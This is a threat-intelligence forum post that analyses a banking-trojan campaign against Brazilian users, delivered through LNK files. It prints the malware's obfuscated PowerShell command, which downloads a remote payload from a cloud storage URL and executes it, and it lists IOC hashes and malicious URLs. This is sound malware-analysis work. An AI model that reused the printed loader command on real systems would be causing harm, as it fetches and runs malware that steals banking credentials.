This website uses Cookies. Click Accept to agree to our website's cookie use as described in our Privacy Policy. Click Preferences to customize your cookie settings.
Accept
Reject
Preferences
ABOUT CHECKMATES & FAQ
Create a Post
Help
cancel
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for 
Search instead for 
Did you mean: 

Brazilian Banker delivered by LNK file

Are you a member of CheckMates?

×
Sign in with your Check Point UserCenter/PartnerMap account to access more great content and get a chance to win some Apple AirPods! If you don't have an account, create one now for free!
Hadar_Waldman
Employee
Employee
2 0 1,251
‎2019-01-15 08:09 AM

On the 10th of October, Threat Intelligence analysts encountered a campaign of banking trojan delivered by LNK via email messages. The campaign is targeting Brazilian emails only and employs different methods to ensure the victim is actually from Brazil, including checking the IP location and language settings of the system.

Technical Analysis

In the first stage of the attack, The LNK file runs PowerShell code (see below) in order to download a file with extension JPG from w4z1news\.online/kdg37/kw1\.jpg, which actually contain a second stage PowerShell script. The script also contains a link to www.java.com/download (which could serve as a decoy).

%SystemRoot%\System32\cmd.exe /V /C C:\Windows\System32\Windowsp^OwE^rsH^El^l\v1.0\POw^Er^SH^eL^L.exe -nop -win 1 Get-Member; Get-NetDomain; Write-Warning 'Nosso site usa cookies para garantir a melhor experiência possível'; 
ieX(iEX('(New-{0}ect N{1}bClient)."doWNloAdsTRiNG"("""{2}-eu-west{3}?tk=HeL""")' -f 'Obj', 'et.We','https://s3','-1.amazonaws.com/killino/Gera.png'));Get-NetDomain
!%SystemRoot%\system32\ieframe.dll‍‍‍‍‍‍‍‍‍

The second stage PowerShell script refers to the same domain to download 2 archive files:

  • w4z1news\.online/kdg37/mf3a\.php- contains a malicious DLL which will be executed in the next step.
  • w4z1news\.online/kdg37/mf3a1\.ah6- contains a few files that will be in use in later stages.

The script then queries WMI to verify that this is not a VM as well as that the OS language is Portuguese. If the parameters returned are wrong, the script exits and does not execute the malware.

After the verification, both archived files are extracted and deleted, and the DLLs are executed.


The DLL file is reaching the other file that was extracted (mf3a1.ah6) and then re-loads itself with another PID but keeps the older process running. It performs another location verification, by checking the system language again.

The DLL seems to be a banker, related to other common banking attacks observed against Brazil in the last years.

IOCs:

LNK file: e39820ec1564338962ba47ef323809aa

Second stage PowerShell: w4z1news\.online/kdg37/kw1\.jpg

DLL download: w4z1news\.online/kdg37/mf3a\.php 

Archive downlaoad: w4z1news\.online/kdg37/mf3a1\.ah6

Tags (3)